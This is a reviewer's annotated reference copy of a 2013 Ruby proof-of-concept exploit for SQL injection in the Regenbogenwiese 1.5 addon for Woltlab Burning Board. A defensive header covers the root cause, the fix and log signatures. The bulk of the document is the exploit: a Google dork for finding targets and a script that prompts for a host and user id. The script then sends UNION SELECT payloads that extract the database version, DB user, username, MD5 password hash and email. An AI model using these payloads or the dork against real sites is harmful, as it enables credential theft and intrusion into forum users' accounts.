# Review notes (reference copy; the script below is Ruby, not Perl, and has been
# collapsed onto two physical lines by extraction, so it is not runnable as shown).
#
# What it does: a 2013 proof-of-concept for a SQL injection in the `kategorie`
# parameter of regenbogenwiese.php (Regenbogenwiese 1.5 addon for Woltlab
# Burning Board). It prompts for host, script path and a user id, then issues
# six plain-HTTP GETs (Net::HTTP on port 80) whose query string appends a
# UNION SELECT to `kategorie`, and scrapes each response for a value wrapped in
# the '~' ... '~' markers the payload itself emits.
#
# Root cause / mitigation: the addon interpolates `kategorie` straight into a
# SQL statement. The fix is a parameterized query (or casting the category to
# an integer before use), never output filtering. The script's own label
# ("Password Account MD5") indicates the affected schema stores unsalted MD5
# password hashes; any deployment still on this addon should also migrate to
# a modern password hash and rotate credentials.
#
# Detection: requests to regenbogenwiese.php whose `kategorie` value contains
# `%27+union+select` (a quote followed by UNION SELECT) are the reliable log /
# WAF signature; the hard-coded table name and column list in the payload are
# not stable across installations and should not be the only thing a rule keys on.
# Responses containing the '~'-delimited marker pairs indicate the injection
# succeeded and the leaked value reached the page body.
#
# Code observations: every request and `match(...)[1]` runs inside one
# begin/rescue that catches any error (network failure, missing marker -> nil
# match -> NoMethodError) and prints only "Exploit Failed", so failures are
# indistinguishable. No TLS is used; the traffic is visible in transit.
# Exploit Title: Woltlab Burning Board Regenbogenwiese 2007 Addon SQL Injection Exploit # Google Dork: inurl:regenbogenwiese.php wbb (and more) # Date: 04.09.2013 # Exploit Author: Easy Laster # Software Name: Regenbogenwiese v1.5 © 2007 by DieKrabbe # Version: 1.5 # Tested on: Windows 8/Backtrack # #!/usr/bin/ruby #secunet.cc #30.07.2013 #regenbogenwiese.php?kategorie='+union+select #+1,1,1,1,1,1,concat(database(),0x3a,user(),0x #3a,userid,0x3a,password,0x3a,username,0x3a,em #ail),1,1,1,1,1,1,1,1+bb1_users+where+userid=1--+ #Discovered and Vulnerability by Easy Laster print " ################################################################ # secunet.cc # ################################################################ #PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT# #Woltlab Burning Board Regenbogenwiese 2007 Addon SQL Injection# # (regenbogenwiese.php, kategorie param) # # Exploit # # Using Host+Path+id # # www.demo.de + /wbb/ + or + / + 1 # # Easy Laster # #PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT# ################################################################ " require 'net/http' block = "################################################################" print ""+ block +"" print "\nEnter Target Name (site.com)->" host=gets.chomp print ""+ block +"" print "\nEnter Script Path (/wbb/ or /)->" path=gets.chomp print ""+ block +"" print "\nEnter The ID From User (id)->" userid=gets.chomp print ""+ block +"" begin dir = "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat(0x27,0x7e,"+ "0x27,version(),0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+where+userid="+ ""+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nVersion Database -> "+(/'~'(.+)'~'/).match(resp.body)[1] dir = "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,conc"+ "at(0x27,0x7e,0x27,user(),0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users"+ "+where+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= 
http.get(path+dir) print "\nDatabase User -> "+(/'~'(.+)'~'/).match(resp.body)[1] dir = "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+ "(0x27,0x7e,0x27,userid,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+wh"+ "ere+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nID Account -> "+(/'~'(.+)'~'/).match(resp.body)[1] dir = "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+ "(0x27,0x7e,0x27,username,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+w"+ "here+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nUsername Account -> "+(/'~'(.+)'~'/).match(resp.body)[1] dir = "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+ "(0x27,0x7e,0x27,password,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+w"+ "here+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nPassword Account MD5 -> "+(/'~'(.+)'~'/).match(resp.body)[1] dir = "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,conc"+ "at(0x27,0x7e,0x27,email,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+"+ "where+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nEmail Adresse Account -> "+(/'~'(.+)'~'/).match(resp.body)[1] print "\n" print ""+ block +"" print "\n" print " ################################################################ # Greetings # ################################################################ -#------------------------+ | | #---------------------+ -#------------------------+ _|_|_ #---------------------+ -#------------------------+ (o o) #---------------------+ -#------------------------+ooO--(_)--Ooo-#---------------------+ ################################################################ " rescue print "\nExploit Failed" end